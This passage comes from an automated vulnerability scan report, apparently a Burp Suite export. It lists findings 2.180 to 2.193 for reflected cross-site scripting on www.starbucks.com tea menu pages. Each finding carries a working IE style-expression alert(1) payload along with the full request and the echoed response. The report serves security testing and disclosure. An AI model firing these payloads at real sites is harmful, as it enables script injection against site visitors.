Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:01 GMT
Connection: close
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake?92f97"style="x:expression(alert(1))"47495068b64=1"/>
...[SNIP]...

2.180. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e510"style="x:expression(alert(1))"35729b21c4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/awake-tea-latte?9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:00 GMT
Connection: close
Content-Length: 42264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte?9e510"style="x:expression(alert(1))"35729b21c4d=1"/>
...[SNIP]...

2.181. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/black-shaken-iced-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f45fc"style="x:expression(alert(1))"a995444f9d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:40 GMT
Connection: close
Content-Length: 42142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style="x:expression(alert(1))"a995444f9d1=1"/>
...[SNIP]...

2.182. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/calm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d301f"style="x:expression(alert(1))"615fe6659bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/calm?d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:24 GMT
Connection: close
Content-Length: 42122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/calm?d301f"style="x:expression(alert(1))"615fe6659bf=1"/>
...[SNIP]...

2.183. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/chai-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1fa3"style="x:expression(alert(1))"8b53a955b6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/chai-latte?d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:19 GMT
Connection: close
Content-Length: 42396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte?d1fa3"style="x:expression(alert(1))"8b53a955b6c=1"/>
...[SNIP]...

2.184. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/china-green-tips

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 122aa"style="x:expression(alert(1))"99a1446dfba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/china-green-tips?122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:32 GMT
Connection: close
Content-Length: 42109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips?122aa"style="x:expression(alert(1))"99a1446dfba=1"/>
...[SNIP]...

2.185. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a03d"style="x:expression(alert(1))"28dfe317897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/earl-grey?4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:22 GMT
Connection: close
Content-Length: 42144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey?4a03d"style="x:expression(alert(1))"28dfe317897=1"/>
...[SNIP]...

2.186. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949d1"style="x:expression(alert(1))"6eaf867621e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:35 GMT
Connection: close
Content-Length: 42568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style="x:expression(alert(1))"6eaf867621e=1"/>
...[SNIP]...

2.187. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/green-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8da2d"style="x:expression(alert(1))"8c880f3ec91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/green-tea-latte?8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:44 GMT
Connection: close
Content-Length: 42307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte?8da2d"style="x:expression(alert(1))"8c880f3ec91=1"/>
...[SNIP]...

2.188. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-awake-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c81c"style="x:expression(alert(1))"7da409656c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:33 GMT
Connection: close
Content-Length: 42304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style="x:expression(alert(1))"7da409656c1=1"/>
...[SNIP]...

2.189. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-chai-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eef62"style="x:expression(alert(1))"cb85efc8b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:14 GMT
Connection: close
Content-Length: 42257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style="x:expression(alert(1))"cb85efc8b12=1"/>
...[SNIP]...

2.190. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-green-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66681"style%3d"x%3aexpression(alert(1))"aa6c3571345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66681"style="x:expression(alert(1))"aa6c3571345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-green-tea-latte?66681"style%3d"x%3aexpression(alert(1))"aa6c3571345=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:22 GMT
Connection: close
Content-Length: 42181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte?66681"style="x:expression(alert(1))"aa6c3571345=1"/>
...[SNIP]...

2.191. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/orange-blossom

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b3b"style="x:expression(alert(1))"d90ff2f9eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/orange-blossom?69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:25 GMT
Connection: close
Content-Length: 42425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom?69b3b"style="x:expression(alert(1))"d90ff2f9eda=1"/>
...[SNIP]...

2.192. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/passion

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cff50"style="x:expression(alert(1))"adbc9364b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/passion?cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:49 GMT
Connection: close
Content-Length: 42330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/passion?cff50"style="x:expression(alert(1))"adbc9364b13=1"/>
...[SNIP]...

2.193. http://www.starbucks.com/menu/drinks/tazo-tea/refresh [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/refresh

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ec5e"style="x:expression(alert(1))"8df00c156e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/refresh?9ec5e"style%3d"x%3aexpression(alert(1))"8df00c156e8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
